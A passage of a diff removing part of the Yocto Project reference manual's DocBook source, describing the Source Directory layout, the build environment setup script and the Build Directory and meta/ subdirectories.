-    </section>
-
-    <section id='handbook'>
-        <title><filename>documentation/</filename></title>
-
-        <para>
-            This directory holds the source for the Yocto Project documentation
-            as well as templates and tools that allow you to generate PDF and HTML
-            versions of the manuals.
-            Each manual is contained in its own sub-folder;
-            for example, the files for this reference manual reside in
-            the <filename>ref-manual/</filename> directory.
-        </para>
-    </section>
-
-    <section id='structure-core-meta'>
-        <title><filename>meta/</filename></title>
-
-        <para>
-            This directory contains the minimal, underlying OpenEmbedded-Core metadata.
-            The directory holds recipes, common classes, and machine
-            configuration for strictly emulated targets (<filename>qemux86</filename>,
-            <filename>qemuarm</filename>, and so forth.)
-        </para>
-    </section>
-
-    <section id='structure-core-meta-poky'>
-        <title><filename>meta-poky/</filename></title>
-
-        <para>
-            Designed above the <filename>meta/</filename> content, this directory
-            adds just enough metadata to define the Poky reference distribution.
-        </para>
-    </section>
-
-    <section id='structure-core-meta-yocto-bsp'>
-        <title><filename>meta-yocto-bsp/</filename></title>
-
-        <para>
-            This directory contains the Yocto Project reference
-            hardware Board Support Packages (BSPs).
-            For more information on BSPs, see the
-            <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
-        </para>
-    </section>
-
-    <section id='structure-meta-selftest'>
-        <title><filename>meta-selftest/</filename></title>
-
-        <para>
-            This directory adds additional recipes and append files
-            used by the OpenEmbedded selftests to verify the behavior
-            of the build system.
-            You do not have to add this layer to your
-            <filename>bblayers.conf</filename> file unless you want to run the
-            selftests.
-        </para>
-    </section>
-
-    <section id='structure-meta-skeleton'>
-        <title><filename>meta-skeleton/</filename></title>
-
-        <para>
-            This directory contains template recipes for BSP and kernel development.
-        </para>
-    </section>
-
-    <section id='structure-core-scripts'>
-        <title><filename>scripts/</filename></title>
-
-        <para>
-            This directory contains various integration scripts that implement
-            extra functionality in the Yocto Project environment (e.g. QEMU scripts).
-            The <link linkend="structure-core-script"><filename>&OE_INIT_FILE;</filename></link>
-            script prepends this directory to the shell's
-            <filename>PATH</filename> environment variable.
-        </para>
-
-        <para>
-            The <filename>scripts</filename> directory has useful scripts that assist in contributing
-            back to the Yocto Project, such as <filename>create-pull-request</filename> and
-            <filename>send-pull-request</filename>.
-        </para>
-    </section>
-
-    <section id='structure-core-script'>
-        <title><filename>&OE_INIT_FILE;</filename></title>
-
-        <para>
-            This script sets up the OpenEmbedded build environment.
-            Running this script with the <filename>source</filename> command in
-            a shell makes changes to <filename>PATH</filename> and sets other
-            core BitBake variables based on the current working directory.
-            You need to run an environment setup script before running BitBake
-            commands.
-            The script uses other scripts within the
-            <filename>scripts</filename> directory to do the bulk of the work.
-        </para>
-
-        <para>
-            When you run this script, your Yocto Project environment is set
-            up, a
-            <link linkend='build-directory'>Build Directory</link>
-            is created, your working directory becomes the Build Directory,
-            and you are presented with some simple suggestions as to what to do
-            next, including a list of some possible targets to build.
-            Here is an example:
-            <literallayout class='monospaced'>
-     $ source oe-init-build-env
-
-     ### Shell environment set up for builds. ###
-
-     You can now run 'bitbake &lt;target&gt;'
-
-     Common targets are:
-         core-image-minimal
-         core-image-sato
-         meta-toolchain
-         meta-ide-support
-
-     You can also run generated qemu images with a command like 'runqemu qemux86-64'
-            </literallayout>
-            The default output of the <filename>oe-init-build-env</filename> script
-            is from the <filename>conf-notes.txt</filename> file, which is found in the
-            <filename>meta-poky</filename> directory within the
-            <link linkend='source-directory'>Source Directory</link>.
-            If you design a custom distribution, you can include your own version
-            of this configuration file to mention the targets defined by your
-            distribution.
-            See the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-custom-template-configuration-directory'>Creating a Custom Template Configuration Directory</ulink>"
-            section in the Yocto Project Development Tasks Manual for more
-            information.
-        </para>
-
-        <para>
-            By default, running this script without a Build Directory
-            argument creates the <filename>build/</filename> directory
-            in your current working directory.
-            If you provide a Build Directory argument when you
-            <filename>source</filename> the script, you direct the OpenEmbedded
-            build system to create a Build Directory of your choice.
-            For example, the following command creates a Build Directory named
-            <filename>mybuilds/</filename> that is outside of the
-            <link linkend='source-directory'>Source Directory</link>:
-            <literallayout class='monospaced'>
-     $ source &OE_INIT_FILE; ~/mybuilds
-            </literallayout>
-            The OpenEmbedded build system uses the template configuration
-            files, which are found by default in the
-            <filename>meta-poky/conf/</filename> directory in the
-            Source Directory.
-            See the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-custom-template-configuration-directory'>Creating a Custom Template Configuration Directory</ulink>"
-            section in the Yocto Project Development Tasks Manual for more
-            information.
-            <note>
-                The OpenEmbedded build system does not support file or directory names that
-                contain spaces.
-                If you attempt to run the <filename>&OE_INIT_FILE;</filename> script
-                from a Source Directory that contains spaces in either the filenames
-                or directory names, the script returns an error indicating no such
-                file or directory.
-                Be sure to use a Source Directory free of names containing spaces.
-            </note>
-        </para>
-    </section>
-
-    <section id='structure-basic-top-level'>
-        <title><filename>LICENSE, README, and README.hardware</filename></title>
-
-        <para>
-            These files are standard top-level files.
-        </para>
-    </section>
-</section>
-
-<section id='structure-build'>
-    <title>The Build Directory - <filename>build/</filename></title>
-
-    <para>
-        The OpenEmbedded build system creates the
-        <link linkend='build-directory'>Build Directory</link>
-        when you run the build environment setup script
-        <link
-linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>.
-        If you do not give the Build Directory a specific name when you run
-        the setup script, the name defaults to <filename>build/</filename>.
-    </para>
-
-    <para>
-        For subsequent parsing and processing, the name of the Build
-        directory is available via the
-        <link linkend='var-TOPDIR'><filename>TOPDIR</filename></link> variable.
-    </para>
-
-    <section id='structure-build-buildhistory'>
-        <title><filename>build/buildhistory/</filename></title>
-
-        <para>
-            The OpenEmbedded build system creates this directory when you
-            enable build history via the <filename>buildhistory</filename> class file.
-            The directory organizes build information into image, packages, and
-            SDK subdirectories.
-            For information on the build history feature, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='structure-build-conf-local.conf'>
-        <title><filename>build/conf/local.conf</filename></title>
-
-        <para>
-            This configuration file contains all the local user configurations
-            for your build environment.
-            The <filename>local.conf</filename> file contains documentation on
-            the various configuration options.
-            Any variable set here overrides any variable set elsewhere within
-            the environment unless that variable is hard-coded within a file
-            (e.g. by using '=' instead of '?=').
-            Some variables are hard-coded for various reasons but such
-            variables are relatively rare.
-        </para>
-
-        <para>
-            At a minimum, you would normally edit this file to select the target
-            <filename><link linkend='var-MACHINE'>MACHINE</link></filename>,
-            which package types you wish to use
-            (<link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>),
-            and the location from which you want to access downloaded files
-            (<filename><link linkend='var-DL_DIR'>DL_DIR</link></filename>).
-        </para>
-
-        <para>
-            If <filename>local.conf</filename> is not present when you
-            start the build, the OpenEmbedded build system creates it from
-            <filename>local.conf.sample</filename> when
-            you <filename>source</filename> the top-level build environment
-            setup script
-            <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>.
-        </para>
-
-        <para>
-            The source <filename>local.conf.sample</filename> file used
-            depends on the <filename>$TEMPLATECONF</filename> script variable,
-            which defaults to <filename>meta-poky/conf/</filename>
-            when you are building from the Yocto Project development
-            environment, and to <filename>meta/conf/</filename> when
-            you are building from the OpenEmbedded-Core environment.
-            Because the script variable points to the source of the
-            <filename>local.conf.sample</filename> file, this implies that
-            you can configure your build environment from any layer by setting
-            the variable in the top-level build environment setup script as
-            follows:
-            <literallayout class='monospaced'>
-     TEMPLATECONF=<replaceable>your_layer</replaceable>/conf
-            </literallayout>
-            Once the build process gets the sample file, it uses
-            <filename>sed</filename> to substitute final
-            <filename>${</filename><link linkend='var-OEROOT'><filename>OEROOT</filename></link><filename>}</filename>
-            values for all <filename>##OEROOT##</filename> values.
-            <note>
-                You can see how the <filename>TEMPLATECONF</filename> variable
-                is used by looking at the
-                <filename>scripts/oe-setup-builddir</filename> script in the
-                <link linkend='source-directory'>Source Directory</link>.
-                You can find the Yocto Project version of the
-                <filename>local.conf.sample</filename> file in the
-                <filename>meta-poky/conf</filename> directory.
-            </note>
-        </para>
-    </section>
-
-    <section id='structure-build-conf-bblayers.conf'>
-        <title><filename>build/conf/bblayers.conf</filename></title>
-
-        <para>
-            This configuration file defines
-            <ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>layers</ulink>,
-            which are directory trees, traversed (or walked) by BitBake.
-            The <filename>bblayers.conf</filename> file uses the
-            <link linkend='var-BBLAYERS'><filename>BBLAYERS</filename></link>
-            variable to list the layers BitBake tries to find.
-        </para>
-
-        <para>
-            If <filename>bblayers.conf</filename> is not present when you
-            start the build, the OpenEmbedded build system creates it from
-            <filename>bblayers.conf.sample</filename> when
-            you <filename>source</filename> the top-level build environment
-            setup script (i.e.
-            <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
-        </para>
-
-        <para>
-            As with the <filename>local.conf</filename> file,
-            the source <filename>bblayers.conf.sample</filename> file used
-            depends on the <filename>$TEMPLATECONF</filename> script variable,
-            which defaults to <filename>meta-poky/conf/</filename>
-            when you are building from the Yocto Project development
-            environment, and to <filename>meta/conf/</filename> when
-            you are building from the OpenEmbedded-Core environment.
-            Because the script variable points to the source of the
-            <filename>bblayers.conf.sample</filename> file, this implies that
-            you can base your build from any layer by setting the variable in
-            the top-level build environment setup script as follows:
-            <literallayout class='monospaced'>
-     TEMPLATECONF=<replaceable>your_layer</replaceable>/conf
-            </literallayout>
-            Once the build process gets the sample file, it uses
-            <filename>sed</filename> to substitute final
-            <filename>${</filename><link linkend='var-OEROOT'><filename>OEROOT</filename></link><filename>}</filename>
-            values for all <filename>##OEROOT##</filename> values.
-            <note>
-                You can see how the <filename>TEMPLATECONF</filename> variable
-                <filename>scripts/oe-setup-builddir</filename> script in the
-                <link linkend='source-directory'>Source Directory</link>.
-                You can find the Yocto Project version of the
-                <filename>bblayers.conf.sample</filename> file in the
-                <filename>meta-poky/conf/</filename> directory.
-            </note>
-        </para>
-    </section>
-
-    <section id='structure-build-conf-sanity_info'>
-        <title><filename>build/cache/sanity_info</filename></title>
-
-        <para>
-            This file indicates the state of the sanity checks and is created
-            during the build.
-        </para>
-    </section>
-
-    <section id='structure-build-downloads'>
-        <title><filename>build/downloads/</filename></title>
-
-        <para>
-            This directory contains downloaded upstream source tarballs.
-            You can reuse the directory for multiple builds or move
-            the directory to another location.
-            You can control the location of this directory through the
-            <filename><link linkend='var-DL_DIR'>DL_DIR</link></filename> variable.
-        </para>
-    </section>
-
-    <section id='structure-build-sstate-cache'>
-        <title><filename>build/sstate-cache/</filename></title>
-
-        <para>
-            This directory contains the shared state cache.
-            You can reuse the directory for multiple builds or move
-            the directory to another location.
-            You can control the location of this directory through the
-            <filename><link linkend='var-SSTATE_DIR'>SSTATE_DIR</link></filename> variable.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp'>
-        <title><filename>build/tmp/</filename></title>
-
-        <para>
-            The OpenEmbedded build system creates and uses this directory
-            for all the build system's output.
-            The
-            <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-            variable points to this directory.
-        </para>
-
-        <para>
-            BitBake creates this directory if it does not exist.
-            As a last resort, to clean up a build and start it from scratch
-            (other than the downloads), you can remove everything in the
-            <filename>tmp</filename> directory or get rid of the
-            directory completely.
-            If you do, you should also completely remove the
-            <filename>build/sstate-cache</filename> directory.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-buildstats'>
-        <title><filename>build/tmp/buildstats/</filename></title>
-
-        <para>
-            This directory stores the build statistics.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-cache'>
-        <title><filename>build/tmp/cache/</filename></title>
-
-        <para>
-            When BitBake parses the metadata (recipes and configuration files),
-            it caches the results in <filename>build/tmp/cache/</filename>
-            to speed up future builds.
-            The results are stored on a per-machine basis.
-        </para>
-
-        <para>
-            During subsequent builds, BitBake checks each recipe (together
-            with, for example, any files included or appended to it) to see
-            if they have been modified.
-            Changes can be detected, for example, through file modification
-            time (mtime) changes and hashing of file contents.
-            If no changes to the file are detected, then the parsed result
-            stored in the cache is reused.
-            If the file has changed, it is reparsed.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-deploy'>
-        <title><filename>build/tmp/deploy/</filename></title>
-
-        <para>
-            This directory contains any "end result" output from the
-            OpenEmbedded build process.
-            The <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>
-            variable points to this directory.
-            For more detail on the contents of the <filename>deploy</filename>
-            directory, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>"
-            and
-            "<ulink url='&YOCTO_DOCS_OM_URL;#sdk-dev-environment'>Application Development SDK</ulink>"
-            sections in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-deploy-deb'>
-        <title><filename>build/tmp/deploy/deb/</filename></title>
-
-        <para>
-            This directory receives any <filename>.deb</filename> packages produced by
-            the build process.
-            The packages are sorted into feeds for different architecture types.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-deploy-rpm'>
-        <title><filename>build/tmp/deploy/rpm/</filename></title>
-
-        <para>
-            This directory receives any <filename>.rpm</filename> packages produced by
-            the build process.
-            The packages are sorted into feeds for different architecture types.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-deploy-ipk'>
-        <title><filename>build/tmp/deploy/ipk/</filename></title>
-
-        <para>
-            This directory receives <filename>.ipk</filename> packages produced by
-            the build process.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-deploy-licenses'>
-        <title><filename>build/tmp/deploy/licenses/</filename></title>
-
-        <para>
-            This directory receives package licensing information.
-            For example, the directory contains sub-directories for <filename>bash</filename>,
-            <filename>busybox</filename>, and <filename>glibc</filename> (among others) that in turn
-            contain appropriate <filename>COPYING</filename> license files with other licensing information.
-            For information on licensing, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-deploy-images'>
-        <title><filename>build/tmp/deploy/images/</filename></title>
-
-        <para>
-            This directory is populated with the basic output objects of the
-            build (think of them as the "generated artifacts" of the build process),
-            including things like the boot loader image, kernel, root filesystem and more.
-            If you want to flash the resulting image from a build onto a device,
-            look here for the necessary components.
-        </para>
-
-        <para>
-            Be careful when deleting files in this directory.
-            You can safely delete old images from this directory (e.g.
-            <filename>core-image-*</filename>).
-            However, the kernel (<filename>*zImage*</filename>, <filename>*uImage*</filename>, etc.),
-            bootloader and other supplementary files might be deployed here prior to building an
-            image.
-            Because these files are not directly produced from the image, if you
-            delete them they will not be automatically re-created when you build the image again.
-        </para>
-
-        <para>
-            If you do accidentally delete files here, you will need to force them to be
-            re-created.
-            In order to do that, you will need to know the target that produced them.
-            For example, these commands rebuild and re-create the kernel files:
-            <literallayout class='monospaced'>
-     $ bitbake -c clean virtual/kernel
-     $ bitbake virtual/kernel
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-deploy-sdk'>
-        <title><filename>build/tmp/deploy/sdk/</filename></title>
-
-        <para>
-            The OpenEmbedded build system creates this directory to hold
-            toolchain installer scripts which, when executed, install the
-            sysroot that matches your target hardware.
-            You can find out more about these installers in the
-            "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
-            section in the Yocto Project Application Development and the
-            Extensible Software Development Kit (eSDK) manual.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-sstate-control'>
-        <title><filename>build/tmp/sstate-control/</filename></title>
-
-        <para>
-            The OpenEmbedded build system uses this directory for the
-            shared state manifest files.
-            The shared state code uses these files to record the files
-            installed by each sstate task so that the files can be removed
-            when cleaning the recipe or when a newer version is about to
-            be installed.
-            The build system also uses the manifests to detect and produce
-            a warning when files from one task are overwriting those from
-            another.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-sysroots-components'>
-        <title><filename>build/tmp/sysroots-components/</filename></title>
-
-        <para>
-            This directory is the location of the sysroot contents that the
-            task
-            <link linkend='ref-tasks-prepare_recipe_sysroot'><filename>do_prepare_recipe_sysroot</filename></link>
-            links or copies into the recipe-specific sysroot for each
-            recipe listed in
-            <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>.
-            Population of this directory is handled through shared state, while
-            the path is specified by the
-            <link linkend='var-COMPONENTS_DIR'><filename>COMPONENTS_DIR</filename></link>
-            variable. Apart from a few unusual circumstances, handling of the
-            <filename>sysroots-components</filename> directory should be
-            automatic, and recipes should not directly reference
-            <filename>build/tmp/sysroots-components</filename>.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-sysroots'>
-        <title><filename>build/tmp/sysroots/</filename></title>
-
-        <para>
-            Previous versions of the OpenEmbedded build system used to
-            create a global shared sysroot per machine along with a native
-            sysroot.
-            Beginning with the &DISTRO; version of the Yocto Project,
-            sysroots exist in recipe-specific
-            <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
-            directories.
-            Thus, the <filename>build/tmp/sysroots/</filename> directory
-            is unused.
-            <note>
-                The <filename>build/tmp/sysroots/</filename> directory
-                can still be populated using the
-                <filename>bitbake build-sysroots</filename> command and can
-                be used for compatibility in some cases.
-                However, in general it is not recommended to populate
-                this directory.
-                Individual recipe-specific sysroots should be used.
-            </note>
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-stamps'>
-        <title><filename>build/tmp/stamps/</filename></title>
-
-        <para>
-            This directory holds information that BitBake uses for
-            accounting purposes to track what tasks have run and when they
-            have run.
-            The directory is sub-divided by architecture, package name, and
-            version.
-            Following is an example:
-            <literallayout class='monospaced'>
-     stamps/all-poky-linux/distcc-config/1.0-r0.do_build-2fdd....2do
-            </literallayout>
-            Although the files in the directory are empty of data,
-            BitBake uses the filenames and timestamps for tracking purposes.
-        </para>
-
-        <para>
-            For information on how BitBake uses stamp files to determine if
-            a task should be rerun, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#stamp-files-and-the-rerunning-of-tasks'>Stamp Files and the Rerunning of Tasks</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-log'>
-        <title><filename>build/tmp/log/</filename></title>
-
-        <para>
-            This directory contains general logs that are not otherwise placed using the
-            package's <filename><link linkend='var-WORKDIR'>WORKDIR</link></filename>.
-            Examples of logs are the output from the
-            <filename>do_check_pkg</filename> or
-            <filename>do_distro_check</filename> tasks.
-            Running a build does not necessarily mean this directory is created.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-work'>
-        <title><filename>build/tmp/work/</filename></title>
-
-        <para>
-            This directory contains architecture-specific work sub-directories
-            for packages built by BitBake.
-            All tasks execute from the appropriate work directory.
-            For example, the source for a particular package is unpacked,
-            patched, configured and compiled all within its own work directory.
-            Within the work directory, organization is based on the package group
-            and version for which the source is being compiled
-            as defined by the
-            <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>.
-        </para>
-
-        <para>
-            It is worth considering the structure of a typical work directory.
-            As an example, consider <filename>linux-yocto-kernel-3.0</filename>
-            on the machine <filename>qemux86</filename>
-            built within the Yocto Project.
-            For this package, a work directory of
-            <filename>tmp/work/qemux86-poky-linux/linux-yocto/3.0+git1+&lt;.....&gt;</filename>,
-            referred to as the <filename>WORKDIR</filename>, is created.
-            Within this directory, the source is unpacked to
-            <filename>linux-qemux86-standard-build</filename> and then patched by Quilt.
-            (See the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#using-a-quilt-workflow'>Using Quilt in Your Workflow</ulink>"
-            section in the Yocto Project Development Tasks Manual for more
-            information.)
-            Within the <filename>linux-qemux86-standard-build</filename> directory,
-            standard Quilt directories <filename>linux-3.0/patches</filename>
-            and <filename>linux-3.0/.pc</filename> are created,
-            and standard Quilt commands can be used.
-        </para>
-
-        <para>
-            There are other directories generated within <filename>WORKDIR</filename>.
-            The most important directory is <filename>WORKDIR/temp/</filename>,
-            which has log files for each task (<filename>log.do_*.pid</filename>)
-            and contains the scripts BitBake runs for each task
-            (<filename>run.do_*.pid</filename>).
-            The <filename>WORKDIR/image/</filename> directory is where "make
-            install" places its output that is then split into sub-packages
-            within <filename>WORKDIR/packages-split/</filename>.
-        </para>
-    </section>
-
-    <section id='structure-build-tmp-work-tunearch-recipename-version'>
-        <title><filename>build/tmp/work/<replaceable>tunearch</replaceable>/<replaceable>recipename</replaceable>/<replaceable>version</replaceable>/</filename></title>
-
-        <para>
-            The recipe work directory - <filename>${WORKDIR}</filename>.
-        </para>
-
-        <para>
-            As described earlier in the
-            "<link linkend='structure-build-tmp-sysroots'><filename>build/tmp/sysroots/</filename></link>"
-            section, beginning with the &DISTRO; release of the Yocto
-            Project, the OpenEmbedded build system builds each recipe in its
-            own work directory (i.e.
-            <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>).
-            The path to the work directory is constructed using the
-            architecture of the given build (e.g.
-            <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>,
-            <link linkend='var-MACHINE_ARCH'><filename>MACHINE_ARCH</filename></link>,
-            or "allarch"), the recipe name, and the version of the recipe (i.e.
-            <link linkend='var-PE'><filename>PE</filename></link><filename>:</filename><link linkend='var-PV'><filename>PV</filename></link><filename>-</filename><link linkend='var-PR'><filename>PR</filename></link>).
-        </para>
-
-        <para>
-            A number of key subdirectories exist within each recipe
-            work directory:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>${WORKDIR}/temp</filename>:
-                    Contains the log files of each task executed for this
-                    recipe, the "run" files for each executed task, which
-                    contain the code run, and a
-                    <filename>log.task_order</filename> file, which lists the
-                    order in which tasks were executed.
-                   </para></listitem>
-                <listitem><para>
-                    <filename>${WORKDIR}/image</filename>:
-                    Contains the output of the
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    task, which corresponds to the
-                    <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>
-                    variable in that task.
-                   </para></listitem>
-                <listitem><para>
-                    <filename>${WORKDIR}/pseudo</filename>:
-                    Contains the pseudo database and log for any tasks executed
-                    under pseudo for the recipe.
-                   </para></listitem>
-                <listitem><para>
-                    <filename>${WORKDIR}/sysroot-destdir</filename>:
-                    Contains the output of the
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task.
-                   </para></listitem>
-                <listitem><para>
-                    <filename>${WORKDIR}/package</filename>:
-                    Contains the output of the
-                    <link linkend='ref-tasks-package'><filename>do_package</filename></link>
-                    task before the output is split into individual packages.
-                   </para></listitem>
-                <listitem><para>
-                    <filename>${WORKDIR}/packages-split</filename>:
-                    Contains the output of the <filename>do_package</filename>
-                    task after the output has been split into individual
-                    packages.
-                    Subdirectories exist for each individual package created
-                    by the recipe.
-                   </para></listitem>
-                <listitem><para>
-                    <filename>${WORKDIR}/recipe-sysroot</filename>:
-                    A directory populated with the target dependencies of the
-                    recipe.
-                    This directory looks like the target filesystem and
-                    contains libraries that the recipe might need to link
-                    against (e.g. the C library).
-                   </para></listitem>
-                <listitem><para>
-                    <filename>${WORKDIR}/recipe-sysroot-native</filename>:
-                    A directory populated with the native dependencies of the
-                    recipe.
-                    This directory contains the tools the recipe needs to build
-                    (e.g. the compiler, Autoconf, libtool, and so forth).
-                   </para></listitem>
-                <listitem><para>
-                    <filename>${WORKDIR}/build</filename>:
-                    This subdirectory applies only to recipes that support
-                    builds where the source is separate from the
-                    build artifacts.
-                    The OpenEmbedded build system uses this directory as a
-                    separate build directory (i.e.
-                    <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>).
-                   </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='structure-build-work-shared'>
-        <title><filename>build/tmp/work-shared/</filename></title>
-
-        <para>
-            For efficiency, the OpenEmbedded build system creates and uses
-            this directory to hold recipes that share a work directory with
-            other recipes.
-            In practice, this is only used for <filename>gcc</filename>
-            and its variants (e.g. <filename>gcc-cross</filename>,
-            <filename>libgcc</filename>, <filename>gcc-runtime</filename>,
-            and so forth).
-        </para>
-    </section>
-</section>
-
-<section id='structure-meta'>
-    <title>The Metadata - <filename>meta/</filename></title>
-
-    <para>
-        As mentioned previously,
-        <link linkend='metadata'>Metadata</link> is the core
-        of the Yocto Project.
-        Metadata has several important subdivisions:
-    </para>
-
-    <section id='structure-meta-classes'>
-        <title><filename>meta/classes/</filename></title>
-
-        <para>
-            This directory contains the <filename>*.bbclass</filename> files.
-            Class files are used to abstract common code so it can be reused by multiple
-            packages.
-            Every package inherits the <filename>base.bbclass</filename> file.
-            Examples of other important classes are <filename>autotools.bbclass</filename>, which
-            in theory allows any Autotool-enabled package to work with the Yocto Project with minimal effort.
-            Another example is <filename>kernel.bbclass</filename> that contains common code and functions
-            for working with the Linux kernel.
-            Functions like image generation or packaging also have their specific class files
-            such as <filename>image.bbclass</filename>, <filename>rootfs_*.bbclass</filename> and
-            <filename>package*.bbclass</filename>.
-        </para>
-
-        <para>
-            For reference information on classes, see the
-            "<link linkend='ref-classes'>Classes</link>" chapter.
-        </para>
-    </section>
-
-    <section id='structure-meta-conf'>
-        <title><filename>meta/conf/</filename></title>
-
-        <para>
-            This directory contains the core set of configuration files that start from
-            <filename>bitbake.conf</filename> and from which all other configuration
-            files are included.
-            See the include statements at the end of the
-            <filename>bitbake.conf</filename> file and you will note that even
-            <filename>local.conf</filename> is loaded from there.
-            While <filename>bitbake.conf</filename> sets up the defaults, you can often override
-            these by using the (<filename>local.conf</filename>) file, machine file or
-            the distribution configuration file.
-        </para>
-    </section>
-
-    <section id='structure-meta-conf-machine'>
-        <title><filename>meta/conf/machine/</filename></title>
-
-        <para>
-            This directory contains all the machine configuration files.
-            If you set <filename>MACHINE = "qemux86"</filename>,
-            the OpenEmbedded build system looks for a <filename>qemux86.conf</filename> file in this
-            directory.
-            The <filename>include</filename> directory contains various data common to multiple machines.
-            If you want to add support for a new machine to the Yocto Project, look in this directory.
-        </para>
-    </section>
-
-    <section id='structure-meta-conf-distro'>
-        <title><filename>meta/conf/distro/</filename></title>
-
-        <para>
-            The contents of this directory controls any distribution-specific
-            configurations.
-            For the Yocto Project, the <filename>defaultsetup.conf</filename> is the main file here.
-            This directory includes the versions and the
-            <filename>SRCDATE</filename> definitions for applications that are configured here.
-            An example of an alternative configuration might be <filename>poky-bleeding.conf</filename>.
-            Although this file mainly inherits its configuration from Poky.
-        </para>
-    </section>
-
-    <section id='structure-meta-conf-machine-sdk'>
-        <title><filename>meta/conf/machine-sdk/</filename></title>
-
-        <para>
-            The OpenEmbedded build system searches this directory for
-            configuration files that correspond to the value of
-            <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>.
-            By default, 32-bit and 64-bit x86 files ship with the Yocto
-            Project that support some SDK hosts.
-            However, it is possible to extend that support to other SDK hosts
-            by adding additional configuration files in this subdirectory
-            within another layer.
-        </para>
-    </section>
-
-    <section id='structure-meta-files'>
-        <title><filename>meta/files/</filename></title>
-
-        <para>
-            This directory contains common license files and several text files
-            used by the build system.
-            The text files contain minimal device information and
-            lists of files and directories with known permissions.
-        </para>
-    </section>
-
-    <section id='structure-meta-lib'>
-        <title><filename>meta/lib/</filename></title>
-
-        <para>
-            This directory contains OpenEmbedded Python library code
-            used during the build process.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-bsp'>
-        <title><filename>meta/recipes-bsp/</filename></title>
-
-        <para>
-            This directory contains anything linking to specific hardware or hardware
-            configuration information such as "u-boot" and "grub".
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-connectivity'>
-        <title><filename>meta/recipes-connectivity/</filename></title>
-
-        <para>
-            This directory contains libraries and applications related to communication with other devices.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-core'>
-        <title><filename>meta/recipes-core/</filename></title>
-
-        <para>
-            This directory contains what is needed to build a basic working Linux image
-            including commonly used dependencies.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-devtools'>
-        <title><filename>meta/recipes-devtools/</filename></title>
-
-        <para>
-            This directory contains tools that are primarily used by the build system.
-            The tools, however, can also be used on targets.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-extended'>
-        <title><filename>meta/recipes-extended/</filename></title>
-
-        <para>
-            This directory contains non-essential applications that add features compared to the
-            alternatives in core.
-            You might need this directory for full tool functionality or for Linux Standard Base (LSB)
-            compliance.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-gnome'>
-        <title><filename>meta/recipes-gnome/</filename></title>
-
-        <para>
-            This directory contains all things related to the GTK+ application framework.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-graphics'>
-        <title><filename>meta/recipes-graphics/</filename></title>
-
-        <para>
-            This directory contains X and other graphically related system libraries.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-kernel'>
-        <title><filename>meta/recipes-kernel/</filename></title>
-
-        <para>
-            This directory contains the kernel and generic applications and libraries that
-            have strong kernel dependencies.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-lsb4'>
-        <title><filename>meta/recipes-lsb4/</filename></title>
-
-        <para>
-            This directory contains recipes specifically added to support
-            the Linux Standard Base (LSB) version 4.x.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-multimedia'>
-        <title><filename>meta/recipes-multimedia/</filename></title>
-
-        <para>
-            This directory contains codecs and support utilities for audio, images and video.
-        </para>
-    </section>
-
-    <section id='structure-meta-recipes-rt'>
-        <title><filename>meta/recipes-rt/</filename></title>
